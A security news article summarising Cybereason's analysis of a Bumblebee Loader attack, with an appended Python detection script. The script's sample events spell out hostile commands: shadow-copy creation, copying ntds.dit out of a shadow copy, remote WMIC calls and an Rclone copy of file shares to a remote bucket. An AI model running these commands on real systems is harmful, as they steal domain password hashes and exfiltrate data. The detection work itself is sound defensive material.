The Cybereason Global Security Operations Center (GSOC) Team analyzed a cyberattack that involved the Bumblebee Loader and detailed how the attackers were able to compromise the entire network.
Most Bumblebee infections started with users executing LNK files, which use a system binary to load the malware. The malware is distributed through phishing messages that carry a malicious attachment or a link to a malicious archive containing Bumblebee.
After initial execution, Bumblebee was used to perform post-exploitation activities, including privilege escalation, reconnaissance, and credential theft.
Threat actors conduct intensive reconnaissance activities and redirect the output of executed commands to files for exfiltration.
Bumblebee has been active since March 2022, when it was spotted by Google’s Threat Analysis Group (TAG). Experts noticed that cybercriminal groups that were previously using BazaLoader and IcedID as part of their malware campaigns switched to the Bumblebee loader.
“Cybereason GSOC has observed threat actors transitioning from BazarLoader, Trickbot, and IcedID to Bumblebee, which seems to be in active development and generally the loader of choice for many threat actors,” reads the analysis published by Cybereason. “Bumblebee operators use the Cobalt Strike framework throughout the attack. The threat actors use the obtained credentials to access Active Directory and make a copy of ntds.dit containing data for the entire Active Directory. Lastly, a domain administrator account is used to move laterally, create local user accounts, and exfiltrate data using Rclone software.”
In the attack analyzed by Cybereason, threat actors used stolen credentials of a highly privileged user to gain access to the Active Directory and compromise the target network.
“Bumblebee accesses the remote Active Directory machines using Windows Management Instrumentation command-line utility (WMIC) and creates a shadow copy using vssadmin command. In addition, the attacker steals the ntds.dit file from the domain controller. The ntds.dit file is a database that stores Active Directory data, including information about user objects, groups and group membership. The file also stores the password hashes for all users in the domain,” continues the analysis.
The experts noticed that the time it took between initial access and Active Directory compromise was less than two days.
GSOC experts warn that attacks involving Bumblebee must be treated as critical. The attack chain they analyzed allows threat actors to deliver their ransomware in the compromised networks.
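The following added example (not from Cybereason or from the original article) matches the behaviours the analysis names, remote WMIC use, vssadmin shadow-copy creation, ntds.dit access and Rclone, against process command lines, and escalates a host where a shadow copy is created and ntds.dit is touched within an hour. The event tuples, host names and the one-hour window are constructed assumptions.

```python
import re
from datetime import datetime, timedelta

# Behaviours named in the article, expressed as regexes over command lines.
RULES = {
    "wmic_remote": re.compile(r"\bwmic(\.exe)?\b.*?/node:", re.I),
    "shadow_copy": re.compile(r"\bvssadmin(\.exe)?\b.*\bcreate\s+shadow\b", re.I),
    "ntds_access": re.compile(r"\bntds\.dit\b", re.I),
    "rclone": re.compile(r"\brclone(\.exe)?\b", re.I),
}
WINDOW = timedelta(hours=1)  # assumed correlation window, tune per environment

# Constructed sample process-creation events: (timestamp, host, command line).
SAMPLE_EVENTS = [
    ("2022-08-01T09:58:00", "WS07", 'wmic /node:"DC01" process list brief'),
    ("2022-08-01T10:00:00", "DC01", "vssadmin create shadow /for=C:"),
    ("2022-08-01T10:03:00", "DC01", r"cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\Temp\ntds.bak"),
    ("2022-08-01T10:05:00", "DC01", "vssadmin list shadows"),
    ("2022-08-02T14:00:00", "FS02", r"rclone.exe copy D:\Shares remote:bucket"),
    ("2022-08-03T08:00:00", "BK01", "vssadmin create shadow /for=D:"),
]

def match_rules(cmdline):
    """Return the sorted names of all rules that match one command line."""
    return sorted(name for name, rx in RULES.items() if rx.search(cmdline))

def triage(events):
    """Return (hits, critical_hosts); a host is critical when shadow-copy
    creation and ntds.dit access occur on it within WINDOW of each other."""
    hits, last_seen, critical = [], {}, set()
    for ts, host, cmd in sorted(events):
        when = datetime.fromisoformat(ts)
        for rule in match_rules(cmd):
            hits.append((ts, host, rule))
            last_seen[(host, rule)] = when
        shadow = last_seen.get((host, "shadow_copy"))
        ntds = last_seen.get((host, "ntds_access"))
        if shadow and ntds and abs(ntds - shadow) <= WINDOW:
            critical.add(host)
    return hits, sorted(critical)

if __name__ == "__main__":
    hits, critical = triage(SAMPLE_EVENTS)
    for hit in hits:
        print(*hit)
    print("critical hosts:", critical)
```

A lone shadow-copy creation (the constructed backup host BK01) is recorded as a hit but not escalated, which keeps routine backup activity from drowning out the domain-controller sequence.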
(SecurityAffairs – hacking, malware)